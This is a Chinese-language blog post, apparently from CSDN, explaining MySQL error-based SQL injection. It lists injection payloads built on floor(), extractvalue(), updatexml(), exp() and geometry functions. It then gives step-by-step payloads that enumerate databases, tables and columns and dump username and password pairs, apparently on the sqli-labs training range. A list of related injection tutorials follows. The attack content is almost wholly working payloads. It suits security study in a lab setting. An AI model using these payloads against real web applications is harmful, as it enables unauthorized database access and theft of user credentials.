报错注入

最新推荐文章于 2024-04-27 15:01:59 发布
最新推荐文章于 2024-04-27 15:01:59 发布
阅读量603 收藏 2
点赞数
文章标签: 攻防渗透 sql注入 报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43271438/article/details/82916653
版权

报错注入一般流程
在这里插入图片描述
报错注入的五种函数
全部都以查user()为例子~

  1. floor()
    id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

  2. extractvalue()
    id = 1 and (extractvalue(1, concat(0x5c,(select user()))))

  3. updatexml()
    id = 1 and (updatexml(0x3a,concat(1,(select user())),1))

  4. exp()
    id =1 and EXP(~(SELECT * from(select user())a))

  5. 有六种函数(但总的来说可以归为一类)
    GeometryCollection()
    id = 1 AND GeometryCollection((select * from (select * from(select user())a)b))
    polygon()
    id =1 AND polygon((select * from(select * from(select user())a)b))
    multipoint()
    id = 1 AND multipoint((select * from(select * from(select user())a)b))
    multilinestring()
    id = 1 AND multilinestring((select * from(select * from(select user())a)b))

linestring()
id = 1 AND LINESTRING((select * from(select * from(select user())a)b))

multipolygon()
id =1 AND multipolygon((select * from(select * from(select user())a)b))

以updatexml为例

  1. 爆库
    id=1 and updatexml(1,concat(0x23,database()),1)
    在这里插入图片描述

  2. 爆表
    id=1 and updatexml(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ )),1)

在这里插入图片描述

  1. 爆字段
    id=1 and updatexml(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),1)

在这里插入图片描述

  1. 爆内容
    id=1 and
    updatexml(1,concat(0x23,(select group_concat(password,username) from security.users),0x23),1)

在这里插入图片描述

以floor为例

  1. 爆库id=1 union Select 1,count(*),concat(0x23,0x23,(select database()),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
    在这里插入图片描述
  2. 爆表id=1 union Select 1,count(*),concat(0x23,0x23,(select count(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
    在这里插入图片描述
    表有六个

id=1 union Select 1,count(*),concat(0x23,0x23,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+

在这里插入图片描述

调整 limit 的参数,将所有表名爆出
id=1 union Select 1,count(*),concat(0x23,0x23,(select table_name from information_schema.tables where table_schema=‘security’ limit 1,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
我们需要的是users表

  1. 爆列名
    id=1 union Select 1,count(*),concat(0x23,0x23,(select count(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+
    在这里插入图片描述
    显示为三列

id=1 union Select 1,count(*),concat(0x23,0x23,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),0x23,0x23,floor(rand(0)*2))a from information_schema.columns group by a–+

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. 爆字段
    and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
    在这里插入图片描述
xaiver phong
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web-报错注入-皮卡丘靶场
07-15
报错注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被错误地用于构造数据库查询时,导致数据库返回错误信息。这些错误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
十种MYSQL显错注入原理讲解(三)
weixin_38023368的博客
09-04 396
1、multipolygon() select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 函数讲解:   multipolygon()是一种由Polygon元素构成的几何对象集合。 原理解释:   multipolygon()需要的是Polygon元素。为了显错传入字符串,所以报错。 2、linestring() select * from tes.
报错注入显示不全问题
矜庄寂寥的博客
12-18 3898
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性显示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
报错注入是什么?一看你就明白了。报错注入原理+步骤+实战案例
最新发布
2401_84266286的博客
04-27 990
适用情况:页面有数据库的报错信息报错信息必须是动态的、来自数据库的报错信息。网站写死的、自定义的报错提示不算。
SQL报错注入
qq_64332865的博客
02-18 587
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
震惊!sql注入 的格式居然被他爆了出来,按照这个格式,新手入侵网站变成可能?!(作者自用格式)
qq_42777804的博客
07-26 832
联合查询 判断是否存在注入 id=1’ 异常 id=1’ and 1=1%23 正确 id=1’ and 1=2%23 错误 说明存在单引号字符型SQL注入 都错误的话,可以尝试数字型,双引号,括号型 2.求列数 id = 1 order by 4%23 正常 Id = 1 order by 5%23异常 说明有4列 格式 id = 1 order by 数字%23 3.求...
关于SQL报错注入数据输出显示不完全的问题
m0_63138919的博客
07-27 1077
本文是对于sql报错注入 数据结果显示不全问题的解决方案 欢迎大家进行补充
第六节 GET报错注入-01
09-15
第六节 GET报错注入-01
MySQL五种报错注入1
08-04
MySQL五种报错注入是一种利用数据库的错误反馈信息来获取敏感数据的技术,通常在网站存在SQL注入漏洞时被攻击者利用。以下将详细介绍这些方法: 1. **数据库版本暴露** 利用`information_schema.tables`系统表和`...
报错注入详解
热门推荐
weixin_45253622的博客
03-19 1万+
报错注入 报错注入SQL注入的一种。 利用前提:页面上没有显示位,但是需要输出SQL语句执行错误信息。比如mysql_error() 优点:不需要显示位 缺点:需要输出mysql_error()的报错信息 报错函数 1、floor报错注入 floor()报错注入是利用count()、rand()、floor()、group by 这几个特定的函数结合在一起产生的注入漏洞,准确的说是floor,count,group by冲突报错。 报错原理:利用数据库表主键不能重复的原理,使用GROUP BY分组,产生主
注入双括号报错注入_WEB安全之SQL注入(7)——updatexml报错注入和extractvalue报错注入...
weixin_34688479的博客
01-05 208
大家好,我是阿里斯,一名IT行业小白。今天分享的内容是报错注入剩余部分,主要内容会以extractvalue()和updatexml()报错误为中心展开阐述。函数介绍extractvalue(参数1,参数2) 参数1:xml文档字符串 参数2:xpath格式字符串 该函数主要用来查找并解析xml文档updatexml(参数1,参数2,参数3) 参数1:xml文档字...
Web安全:SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 2422
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
SQL 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-23 7708
SQL 注入漏洞原理以及修复方法
基于报错型的注入
weixin_30386713的博客
07-19 178
一、floor() 、rand()、和 group by 组合: select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x 通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(...
CTFHub笔记之技能树-web:报错注入
weixin_48799157的博客
03-19 391
小白一个,如有错误请指正! 对这方面不是很熟悉,补了一下知识点: https://blog.csdn.net/silence1_/article/details/90812612https://blog.csdn.net/silence1_/article/details/90812612 解法一: 1.用extractvalue()函数爆数据库 select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
sql注入(6)报错注入
c10udz的博客
05-11 5024
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 919
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
Sql注入
m0_60715541的博客
12-04 2167
Sql注入是通过拼接sql查询语句,使Sql查询的时候发生歧义,导致攻击者可以查询数据库的全部信息​ 攻击对象是数据库。存在威胁:SQL注入漏洞对于数据安全的影响: sql注入防范 解决SQL注入问题的关键是对所有可能来自用户输入的数据进行严格的检查、对数据库配置使用最小权限原则。通常修复使用的方案有:代码层面: ​ 没有进行PDO预处理的SQL,在输入SQL语句进行执行的时候,web服务器自己拼凑SQL的时候有可能会把危险的SQL语句拼凑进去。但如果进行了PDO预处理的SQL,会让MYSQL自己
报错注入函数指南
qq_28624871的博客
05-01 2186
1. geometrycollection() mysql版本5.5   (1)函数解释: GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。   (2)官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))   (3)报错原因: 因为MYSQL无法使用这样的字符串画
updatexml报错注入
05-31
如果您遇到了 "updatexml" 报错注入,可能是因为您的应用程序存在 SQL 注入漏洞。"updatexml" 是一种用于更新 XML 数据的 SQL 函数,但是如果应用程序没有正确验证用户输入的数据,攻击者就可以通过构造恶意的输入数据来进行 SQL 注入攻击,从而导致 "updatexml" 报错。 为了防止 SQL 注入攻击,您应该使用参数化查询或预处理语句来处理用户输入的数据,而不是直接将用户输入的数据拼接到 SQL 查询语句中。另外,您还应该对用户输入的数据进行验证和过滤,以确保输入的数据符合预期的格式和类型,从而防止恶意输入。 如果您的应用程序已经存在 SQL 注入漏洞,建议立即修复该漏洞,以避免被攻击者利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值